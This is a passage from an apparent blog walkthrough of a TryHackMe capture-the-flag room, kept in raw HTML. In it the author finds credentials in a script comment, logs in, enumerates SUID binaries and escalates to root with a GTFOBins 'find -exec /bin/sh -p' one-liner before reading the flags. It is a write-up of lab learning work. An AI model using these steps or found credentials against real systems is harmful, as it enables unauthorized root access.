class="nv">$USER</span>@<span class="nv">$REMOTE</span>:<span class="nv">$TARGET</span>/<span class="nv">$DATE</span> <span class="nb">echo</span> <span class="nv">$i</span> <span class="s2">"completed"</span> <span class="o">&gt;&gt;</span> <span class="nv">$LOG</span> <span class="k">if</span> <span class="o">[</span> <span class="nt">-n</span> <span class="sb">`</span>ssh <span class="nv">$USER</span>@<span class="nv">$REMOTE</span> <span class="nb">ls</span> <span class="nv">$TARGET</span>/<span class="nv">$DATE</span>/<span class="nv">$i</span> 2&gt;/dev/null<span class="sb">`</span> <span class="o">]</span><span class="p">;</span><span class="k">then </span><span class="nb">rm</span> <span class="nv">$SOURCE</span>/<span class="nv">$i</span> <span class="nb">echo</span> <span class="nv">$i</span> <span class="s2">"removed"</span> <span class="o">&gt;&gt;</span> <span class="nv">$LOG</span> <span class="nb">echo</span> <span class="s2">"####################"</span> <span class="o">&gt;&gt;</span> <span class="nv">$LOG</span> <span class="k">else </span><span class="nb">echo</span> <span class="s2">"Copy not complete"</span> <span class="o">&gt;&gt;</span> <span class="nv">$LOG</span> <span class="nb">exit </span>0 <span class="k">fi done else </span><span class="nb">echo</span> <span class="s2">"Directory is not present"</span> <span class="o">&gt;&gt;</span> <span class="nv">$LOG</span> <span class="nb">exit </span>0 <span class="k">fi</span> </code></pre> </div> <p>I found a code and there is a username and password:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">USER</span><span class="o">=</span>stoner <span class="c">#superduperp@$$no1knows</span> </code></pre> </div> <p>Let's try to login.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fakc2x02xwvmzy78l2vl1.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fakc2x02xwvmzy78l2vl1.png" alt=" " width="800" height="464"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd56ml2zqzqzcl8nx0dqr.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd56ml2zqzqzcl8nx0dqr.png" alt=" " width="800" height="239"></a></p> <p>There is a .secret file</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3yl656m3990vmv0pycm8.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3yl656m3990vmv0pycm8.png" alt=" " width="590" height="104"></a></p> <ul> <li>user.txt =&gt; You made it till here, well done.</li> </ul> <p>Now we need root access to gain full control over the system. So i did some digging, and identified SUID binaries by running <code>find / -perm -4000 2&gt;/dev/null</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6kzpuw3n05iq1wlc4dmc.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6kzpuw3n05iq1wlc4dmc.png" alt=" " width="800" height="435"></a></p> <p>We have <code>/usr/bin/find</code>, <code>/usr/bin/sudo</code>, <code>usr/bin/passwd</code>.</p> <p>Let's try <code>/usr/bin/find</code> first. I looked at <a href="https://gtfobins.org/gtfobins/find/" rel="noopener noreferrer">https://gtfobins.org/gtfobins/find/</a> and tried to exploit using <code>find . -exec /bin/sh -p \; -quit</code>. Just type <code>/usr/bin/</code> without <code>find</code> and paste it.</p> <p><code>/usr/bin/find . -exec /bin/sh -p \; -quit</code></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fozhjbxqel6r46n5im2re.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fozhjbxqel6r46n5im2re.png" alt=" " width="800" height="102"></a></p> <p>And now we're root user.</p> <ul> <li>What did you exploit to get the privileged user? <code>find</code> </li> </ul> <p>Now we can get the root flag navigating <code>/root</code> directory and print the output.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fir2nb9vgpueuxvldxfkw.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fir2nb9vgpueuxvldxfkw.png" alt=" " width="660" height="208"></a></p> <p>We got the root.txt!</p> <ul> <li>root.txt =&gt; It wasn't that hard, was it?</li> </ul> <p><strong>Quick note:</strong> I kept this guide clean and focused on what worked. In reality, I tested many other endpoints, forms, and pages — but showing all those dead ends would've made this too messy.</p> <p>I'm still learning, so this walkthrough may not be perfect. If you find an error or a better approach, please reach out — I'd genuinely appreciate the feedback.</p> <p>Hope you learned something useful! Questions? Feel free to ask — I'm happy to help. 👍</p> <p><a href="https://www.linkedin.com/in/mikail-kakabayev-5401183aa?utm_source=share_via&amp;utm_content=profile&amp;utm_medium=member_ios" rel="noopener noreferrer">https://www.linkedin.com/in/mikail-kakabayev</a></p> ctf tryhackme